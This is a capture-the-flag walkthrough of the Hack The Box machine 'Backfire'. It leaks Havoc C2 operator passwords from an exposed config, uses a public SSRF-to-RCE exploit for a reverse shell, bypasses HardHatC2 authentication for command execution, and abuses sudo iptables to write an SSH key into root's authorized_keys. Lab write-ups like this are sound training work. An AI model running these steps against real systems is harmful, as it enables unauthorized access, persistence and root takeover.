Hack The Box / LINUX / 2025-01-25

Hack The Box — Backfire (Linux)

Exposed Havoc config leaks operator creds, SSRF-to-RCE lands shell as ilya, HardHatC2 auth bypass gives command execution as sergej, and sudo iptables abuse writes root authorized_keys.

Target

IP: 10.129.234.64

Recon

sudo nmap -sC -sV 10.129.234.64 -p- -T5 -v

PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
|   256 7d:6b:ba:b6:25:48:77:ac:3a:a2:ef:ae:f5:1d:98:c4 (ECDSA)
|_  256 be:f3:27:9e:c6:d6:29:27:7b:98:18:91:4e:97:25:99 (ED25519)
443/tcp  open     ssl/http nginx 1.22.1
| tls-alpn:
|   http/1.1
|   http/1.0
|_  http/0.9
| ssl-cert: Subject: commonName=127.0.0.1/stateOrProvinceName=Arizona/countryName=US
| Subject Alternative Name: IP Address:127.0.0.1
| Issuer: commonName=127.0.0.1/stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-08T18:59:38
| Not valid after:  2027-08-08T18:59:38
| MD5:   08c5:558e:cfd7:715b:2b36:b559:193c:abfd
|_SHA-1: 5495:7eda:84c3:70fd:fd8f:509c:8667:76a8:4f35:1e58
|_http-server-header: nginx/1.22.1
|_ssl-date: TLS randomness does not represent time
|_http-title: 404 Not Found
5000/tcp filtered upnp
7096/tcp filtered unknown
8000/tcp open     http     nginx 1.22.1
| http-methods:
|_  Supported Methods: GET HEAD POST
| http-ls: Volume /
| SIZE  TIME               FILENAME
| 1559  17-Dec-2024 11:31  disable_tls.patch
| 875   17-Dec-2024 11:34  havoc.yaotl
|_
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Index of /
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Go to http://10.129.234.64:8000/.

We can download two files:

disable_tls.patch
havoc.yaotl

In havoc.yaotl we find credentials:

Operators {
    user "ilya" {
        Password = "CobaltStr1keSuckz!"
    }

    user "sergej" {
        Password = "1w4nt2sw1tch2h4rdh4tc2"
    }
}

If we try connecting with SSH, it does not work.

We also find additional information:

Teamserver {
    Host = "127.0.0.1"
    Port = 40056


Listeners {
    Http {
        Name = "Demon Listener"
        Hosts = [
            "backfire.htb"
        ]
        HostBind = "127.0.0.1"
        PortBind = 8443
        PortConn = 8443
        HostRotation = "round-robin"
        Secure = true
    }
}

Add backfire.htb to /etc/hosts.

We know the target host runs Havoc (https://github.com/HavocFramework/Havoc).

There is a CVE with PoC:

https://github.com/chebuya/Havoc-C2-SSRF-poc

git clone https://github.com/chebuya/Havoc-C2-SSRF-poc.git
openssl req -newkey rsa:4096 -nodes -keyout key.pem -x509 -days 365 -out cert.pem
sudo openssl s_server -accept 443 -key key.pem -cert cert.pem

Open Havoc client.

Connect to 127.0.0.1 on port 443.

In the openssl s_server terminal we get:

GET /havoc/ HTTP/1.1
Host: 127.0.0.1:443
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: R5wVBy5K2K8Vd052q9nzUg==
Sec-WebSocket-Version: 13

Now we need to modify the PoC exploit so it sends the request above.

request_data = b"GET /havoc/ HTTP/1.1\r\nHost: www.example.com\r\nConnection: Upgrade\r\nUpgrade: websocket\r\nSec-WebSocket-Key: R5wVBy5K2K8Vd052q9nzUg==\r\nSec-WebSocket-Version: 13\r\n\r\n"

We do not get anything in response.

We also tried a TLS socket server and sending messages with Havoc client, but it did not work.

There is another newer PoC already prepared for this machine:

https://github.com/HimmeL-Byte/CVE-2024-41570-SSRF-RCE

git clone https://github.com/HimmeL-Byte/CVE-2024-41570-SSRF-RCE.git
cd CVE-2024-41570-SSRF-RCE.git

Modify payload.sh with your own IP and port.

Start an HTTP server:

python3 -m http.server 80

Start netcat listener:

nc -vlnp 4444

Modify exploit.py with your HTTP server URL.

python3 CVE-2024-41570-SSRF-RCE/exploit.py --target https://backfire.htb/ -i 127.0.0.1 -p 40056

We get a reverse shell as user ilya.

On attacker machine:

ssh-keygen -f ilya_key

Copy the public key.

On target machine:

cd
echo '<copied_stuff>' >> .ssh/authorized_keys

On attacker machine:

ssh -i ilya_key ilya@backfire.htb

We get an SSH session.

cat hardhat.txt

Sergej said he installed HardHatC2 for testing and  not made any changes to the defaults
I hope he prefers Havoc bcoz I don't wanna learn another C2 framework, also Go > C#

ss -ltpn

State                       Recv-Q                      Send-Q                                           Local Address:Port                                              Peer Address:Port                      Process
LISTEN                      0                           4096                                                 127.0.0.1:40056                                                  0.0.0.0:*
LISTEN                      0                           511                                                    0.0.0.0:8000                                                   0.0.0.0:*
LISTEN                      0                           512                                                    0.0.0.0:5000                                                   0.0.0.0:*
LISTEN                      0                           512                                                    0.0.0.0:7096                                                   0.0.0.0:*
LISTEN                      0                           4096                                                 127.0.0.1:8443                                                   0.0.0.0:*
LISTEN                      0                           511                                                    0.0.0.0:443                                                    0.0.0.0:*
LISTEN                      0                           128                                                    0.0.0.0:22                                                     0.0.0.0:*
LISTEN                      0                           128                                                       [::]:22                                                        [::]:*

HardHatC2 by default listens on port 7096.

ssh ilya@backfire.htb -i ilya_key -NL 5000:localhost:5000 -NL 7096:localhost:7096

Useful reference:

https://blog.sth.sh/hardhatc2-0-days-rce-authn-bypass-96ba683d9dd7

Copy the PoC script into file exp.py.

In exp.py, set:

rhost = 'localhost:5000'

Run it:

python3 exp.py

A user sth_pentest with password sth_pentest is created.

Go to https://localhost:7096/.

Go to https://localhost:7096/ImplantInteract.

Click Add tab.

We have a terminal and can execute commands.

On our machine:

ssh-keygen -f sergej_key

In the server terminal:

echo '<public_key>' >> /home/sergej/.ssh/authorized_keys

On our machine run:

ssh -i sergej_key sergej@backfire.htb

We get an SSH session as sergej.

sudo -l

Matching Defaults entries for sergej on backfire:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User sergej may run the following commands on backfire:
    (root) NOPASSWD: /usr/sbin/iptables
    (root) NOPASSWD: /usr/sbin/iptables-save

Useful reference:

https://www.shielder.com/blog/2024/09/a-journey-from-sudo-iptables-to-local-privilege-escalation/

On attacker machine:

ssh-keygen -f root_key

sudo iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\n<public_key>\n'
sudo iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 5000 -j ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 5000 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 5000 -j REJECT --reject-with icmp-port-unreachable
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 7096 -j ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 7096 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 7096 -j REJECT --reject-with icmp-port-unreachable
-A INPUT -i lo -m comment --comment "
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEBgcsLPGaE6KN7KBjg33vZFjapBhAOzbE1p6daDq0Z+ kali@kali
" -j ACCEPT

sudo iptables-save -f /root/.ssh/authorized_keys
ssh -i root_key root@backfire.htb

We get an SSH session as root.